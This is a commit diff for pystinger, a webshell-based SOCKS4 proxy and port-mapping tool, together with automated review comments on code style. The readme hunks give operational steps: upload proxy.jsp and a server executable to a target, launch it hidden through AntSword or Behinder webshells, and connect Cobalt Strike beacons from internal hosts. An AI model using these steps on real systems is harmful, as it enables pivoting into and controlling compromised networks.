Commit a77bc3b

author
zhaochengyu
committed
Update readme
1 parent 7cc1581 commit a77bc3b

3 files changed

+40
-23
lines changed

readme.md

+26-13
@@ -1,12 +1,20 @@
1-
# 毒刺(pystinger_for_darkshadow)
2-
毒刺(pystinger_for_darkshadow)是一个通过webshell实现**内网SOCK4代理**,**端口映射**.工具主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
1+
# 毒刺(pystinger)
2+
3+
毒刺(pystinger)通过webshell实现**内网SOCK4代理**,**端口映射**.
4+
5+
可直接用于metasploit-framework,viper,cobalt strike上线
6+
7+
主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
8+
39
# 使用方法
410

511
## SOCK4代理
6-
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
12+
13+
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
714
* 将stinger_server.exe和stinger_server.vbs上传到目标服务器,蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
8-
(修改vbs中路径,不要直接运行exe文件,会导致tcp断连)
9-
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
15+
> 修改vbs中exe路径,不要直接运行exe文件,会导致tcp断连
16+
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
17+
* 如下输出表示成功
1018
```
1119
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
1220
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
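Review bot: The command documented at new line 16 uses `-l 0.0.0.0 -p 60000`, but the sample output kept directly below it (new line 19) was produced with `-l 127.0.0.1`, so the instruction and its expected output disagree. Use the same listen address in both places and say what the `-l` value controls: `127.0.0.1` binds the local listener to loopback only, while `0.0.0.0` binds it on every interface of the client machine.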
@@ -37,10 +45,12 @@ root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1
3745
* 此时已经在本地60000启动了一个192.168.3.11所在内网的socks4代理
3846

3947
## cobalt strike单主机上线
40-
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
48+
49+
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
4150
* 将stinger_server.exe和stinger_server.vbs上传到目标服务器,蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
42-
(修改vbs中路径,不要直接运行exe文件,会导致tcp断连)
43-
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
51+
> 修改vbs中路径,不要直接运行exe文件,会导致tcp断连
52+
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
53+
* 如下输出表示成功
4454
```
4555
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
4656
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
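Review bot: The blockquote at new line 51 reads `修改vbs中路径`, while the same note in the SOCK4 section (new line 15) was reworded to `修改vbs中exe路径`; make the two identical. The upload, start and run steps are now copied verbatim into each section, which is how this drift crept in, so consider stating them once in a shared "setup" subsection and referring to it from the later sections.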
@@ -67,20 +77,23 @@ root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1
6777
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
6878
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
6979
```
70-
* cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
80+
* cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
7181
* 生成payload,上传到主机运行后即可上线
7282

7383
## cobalt strike多主机上线
74-
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp)可以访问,页面返回 stinger XXX!
84+
85+
* proxy.jsp上传到目标服务器,确保 [http://192.168.3.11:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX!
7586
* 将stinger_server.exe上传到目标服务器
7687
* 修改stinger_server.vbs,示例如下:
7788
```
7889
Set ws = CreateObject("Wscript.Shell")
7990
ws.run "cmd /c D:\XXXXX\stinger_server.exe 192.168.3.11",vbhide
8091
```
81-
(192.168.3.11可以改成0.0.0.0)
82-
*蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
83-
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```,生成如下输出表示成功
92+
> 192.168.3.11可以改成0.0.0.0
93+
94+
* 蚁剑/冰蝎执行```stinger_server.vbs```启动服务端
95+
* stinger_client命令行执行```./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000```
96+
* 如下输出表示成功
8497
```
8598
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
8699
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
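Review bot: The blockquote at new line 92 (`192.168.3.11可以改成0.0.0.0`) says the argument can be changed but not what the argument is or what either value means for the server process; add one sentence describing the parameter passed to `stinger_server.exe`. The change also leaves two empty lines (93 and 94) after the blockquote where the other sections use none, and the VBS sample fence at line 88 carries no language tag.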

stinger_client.py

+2-3
@@ -55,7 +55,7 @@ def __init__(self):
5555
# }
5656
# socket参数
5757
self.LOCAL_ADDR = None
58-
self.READ_BUFF_SIZE = 51200
58+
self.READ_BUFF_SIZE = 11200
5959
# 日志参数
6060
self.LOG_LEVEL = "INFO"
6161
self.logger = get_logger(level=self.LOG_LEVEL, name="StreamLogger")
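Review bot: `READ_BUFF_SIZE` drops from 51200 to 11200 at line 58 with no comment, and the commit message describes a readme update only, so this behavioural change is undocumented. 51200 was 50 × 1024, whereas 11200 is not a multiple of 1024; confirm the value is intended, record the reason next to the assignment, and move code changes like this one into a commit whose message names them.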
@@ -102,9 +102,8 @@ def _post_data(self, url, data={}):
102102
else:
103103
return web_return_data
104104
except Exception as E:
105-
106105
self.logger.warning("WEBSHELL return wrong data")
107-
self.logger.warning(r.content)
106+
self.logger.debug(r.content)
108107
return None
109108

110109
def run(self):
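Review bot: The handler at lines 104-107 reads `r.content` inside `except Exception as E:`; if the exception is raised before `r` is assigned (the `try` body is outside this hunk), that line raises `NameError` and masks the original error. Guard the access, and log `E` itself, which is currently caught and never used. With `LOG_LEVEL = "INFO"` from the previous hunk, moving the body to `debug` means the only remaining output is the fixed string "WEBSHELL return wrong data", so include at least the exception type or response length at warning level. The signature in the hunk header, `def _post_data(self, url, data={})`, also uses a mutable default argument; prefer `data=None`.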

stinger_server.pyw

+12-7
@@ -14,7 +14,7 @@ try:
1414
except Exception as E:
1515
from SocketServer import BaseRequestHandler
1616
from SocketServer import ThreadingTCPServer
17-
17+
import os
1818
import threading
1919
import time
2020
from socket import AF_INET, SOCK_STREAM
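Review bot: `import os` at line 17 replaces the blank line that separated the `try`/`except` import fallback from the plain imports, so the fallback block now runs straight into the module-level import list. Keep the blank line after the `except` branch and add `import os` to the group below it.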
@@ -308,7 +308,8 @@ class ControlCenter(threading.Thread):
308308
client_address_one_data = mirror_post_send_data.get(mirror_client_address)
309309

310310
if serverGlobal.MIRROR_CHCHE_CONNS.get(mirror_client_address) is None:
311-
serverGlobal.logger.warning("MIRROR_CLIENT_ADDRESS:{} not in MIRROR_CHCHE_CONNS".format(mirror_client_address))
311+
serverGlobal.logger.warning(
312+
"MIRROR_CLIENT_ADDRESS:{} not in MIRROR_CHCHE_CONNS".format(mirror_client_address))
312313
continue
313314
else:
314315
server_socket_conn = serverGlobal.MIRROR_CHCHE_CONNS.get(mirror_client_address).get("conn")
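Review bot: `MIRROR_CHCHE_CONNS` (lines 310-315) looks like a misspelling of `MIRROR_CACHE_CONNS`, and rewrapping the warning was a good moment to fix it in both the attribute and the message. The same key is also looked up twice, once for the `is None` test and again in the `else` branch; assign `serverGlobal.MIRROR_CHCHE_CONNS.get(mirror_client_address)` to a local once and reuse it, which also closes the window in which the entry could be removed between the two calls by another thread.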
@@ -332,12 +333,13 @@ class ControlCenter(threading.Thread):
332333
if len(tcp_send_data) > 0:
333334
serverGlobal.logger.info(
334335
"MIRROR_CLIENT_ADDRESS:{} CLIENT_TCP_SEND_LEN:{}".format(mirror_client_address,
335-
len(tcp_send_data)))
336+
len(tcp_send_data)))
336337

337338
send_flag = True
338339
break
339340
except Exception as E: # socket 已失效
340-
serverGlobal.logger.warning("MIRROR_CLIENT_ADDRESS:{} Client send failed".format(mirror_client_address))
341+
serverGlobal.logger.warning(
342+
"MIRROR_CLIENT_ADDRESS:{} Client send failed".format(mirror_client_address))
341343
serverGlobal.logger.exception(E)
342344

343345
if send_flag is not True:
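Review bot: The `logger.warning(...)` rewrapped at lines 341-342 is followed immediately by `logger.exception(E)`, so every send failure produces two records and the traceback is detached from the line that names the client address. One call, `serverGlobal.logger.exception("MIRROR_CLIENT_ADDRESS:%s Client send failed", mirror_client_address)`, logs the message and the traceback together. `except Exception` is also wider than the `# socket 已失效` comment suggests; catching the socket error type would keep unrelated bugs from being reported as a dead socket.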
@@ -362,7 +364,7 @@ class ControlCenter(threading.Thread):
362364
if len(tcp_recv_data) > 0:
363365
serverGlobal.logger.info(
364366
"MIRROR_CLIENT_ADDRESS:{} SERVER_TCP_RECV_LEN:{}".format(mirror_client_address,
365-
len(tcp_recv_data)))
367+
len(tcp_recv_data)))
366368
revc_flag = True
367369
break
368370
except Exception as err:
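Review bot: `revc_flag` at line 368 looks like a transposition of `recv_flag` (the send path in the previous hunk uses `send_flag`); rename it wherever it is used. This hunk is otherwise a whitespace-only realignment, which would be easier to review in a formatting-only commit.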
@@ -380,6 +382,9 @@ class ControlCenter(threading.Thread):
380382
if __name__ == '__main__':
381383

382384
if len(sys.argv) > 1:
385+
if sys.argv[1] == "check":
386+
print(os.path.dirname(os.path.realpath(sys.argv[0])))
387+
sys.exit(1)
383388
listenip = sys.argv[1]
384389
else:
385390
listenip = LOCALADDR
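Review bot: The `check` branch at lines 385-387 ends with `sys.exit(1)`, which reports failure to the caller even though the branch did exactly what was asked; exit with 0 on success. `check` also shares `sys.argv[1]` with the listen address, so any other string falls through to `listenip = sys.argv[1]` unvalidated; parsing the arguments with `argparse` would separate the subcommand from the address and reject malformed input. The readme hunks in this commit do not mention the new argument.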
@@ -394,7 +399,7 @@ if __name__ == '__main__':
394399
break
395400
if SERVER_LISTEN is None:
396401
print("[x] There is no available control server port")
397-
exit(1)
402+
sys.exit(1)
398403

399404
MIRROR_LISTEN = None
400405
for port in MIRROR_PORT:
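Review bot: The failure message at line 401 is still written with `print` to stdout before a non-zero exit; send it to `sys.stderr` or to the logger so it is kept apart from normal output. The readme in this commit starts the server through `ws.run ... ,vbhide`, where no console is visible at all, so a log record is the only place this error would be seen.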
@@ -405,7 +410,7 @@ if __name__ == '__main__':
405410
break
406411
if MIRROR_LISTEN is None:
407412
print("[x] There is no available mirror server port")
408-
exit(1)
413+
sys.exit(1)
409414

410415
serverGlobal = ServerGlobal()
411416
serverGlobal.SERVER_LISTEN = SERVER_LISTEN
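Review bot: The mirror-port block ending at line 413 follows the same "try each port, `break`, else print and `sys.exit(1)`" pattern as the control-port block in the previous hunk, and this change had to be applied to both copies. Move the pattern into one helper that takes the port list and a label and returns the bound listener, so the exit path and message format live in one place.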
